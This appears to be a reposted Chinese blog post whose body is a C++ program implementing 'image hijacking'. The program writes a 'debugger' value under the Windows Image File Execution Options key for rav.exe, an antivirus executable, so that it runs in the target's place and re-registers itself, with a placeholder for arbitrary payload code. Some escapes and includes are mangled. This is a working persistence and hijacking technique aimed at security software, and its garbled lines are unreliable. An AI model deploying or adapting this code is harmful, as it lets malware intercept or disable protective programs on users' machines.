阅读 126

VC++实现镜像劫持(360保险箱启动原理)

   VC++实现镜像劫持(360保险箱启动原理)    


#include "stdafx.h"
#include

int main(int argc, char* argv[])
{
 char temp[256];
 DWORD ret;
 LPCTSTR szRegKey="SOFTWARE//Microsoft//Windows NT//CurrentVersion//Image File Execution Options"; //定义字符串指针,保存映像劫持的键位
 HKEY h_KEY;
 if(argc!=1)   //如果参数不是1个,提取第2个参数,也就是被劫持程序的路径
 {
  memset(temp,0,256);
  strcpy(temp,argv[1]);  
  for(int i=0;i<strlen(temp);i++)    //将路径中的/换为/,也可以换为//,就是代码长了点
  {
   if(temp[i]=='//')
    temp[i]='/';
  }        
  ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,szRegKey,0,KEY_ALL_ACCESS,&h_KEY); //打开注册表中需要映像劫持的子键获得句柄
  if(ret==ERROR_SUCCESS)
  {
   printf("open ok!/n");
   if(ERROR_SUCCESS==RegDeleteKey(h_KEY,"rav.exe")) //将上面打开的子键下的rav子键删除
   {
    printf("delete ok!/n");
    RegCloseKey(h_KEY);
    WinExec(temp,SW_SHOW);    //运行被劫持的程序
   }
   else
   {
    printf("delete failed!/n");
    RegCloseKey(h_KEY);
   }   
  }
  else
  printf("open failed!/n");
 }
 memset(temp,0,256);
 GetModuleFileName(NULL,temp,256);   //得到程序自己的路径,为下面写入注册表做准备
 HKEY hResultKey = NULL;
 if (ERROR_SUCCESS == RegOpenKeyEx(HKEY_LOCAL_MACHINE,szRegKey, 0, KEY_ALL_ACCESS,&h_KEY))  //打开注册表中映像劫持的子键,获得句柄
 {
  DWORD dw;
  ret = RegCreateKeyEx(h_KEY,"rav.exe", 0, REG_NONE,REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL,&hResultKey, &dw);  //在上面打开的子键下创建rav子键并打开,获得句柄
  if (ret!=ERROR_SUCCESS)
  {
  RegCloseKey(h_KEY);
  printf("creat failed!/n");
  return 1;
  }
  printf("creat ok!/n");
  ret=RegSetValueEx(hResultKey,"debugger",0,REG_SZ,(const BYTE *)temp,strlen(temp)+1);   //在rav键上创建debugger键并设置值为本程序的路径用于映像劫持
  if(ret!=ERROR_SUCCESS)
  {
  RegCloseKey(h_KEY);
  RegCloseKey(hResultKey);
  return 1;
  }
  RegCloseKey(h_KEY);
  RegCloseKey(hResultKey);
  printf("set ok!/n");
 }
 MessageBox(NULL,"ok!","成功!",MB_OK);    //用于测试程序,可换为其他需要执行代码
 

 return 0;
}



©著作权归作者所有:来自51CTO博客作者yinchengmvp的原创作品,如需转载,请注明出处,否则将追究法律责任


文章分类
后端
版权声明:本站是系统测试站点,无实际运营。本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 XXXXXXo@163.com 举报,一经查实,本站将立刻删除。
相关推荐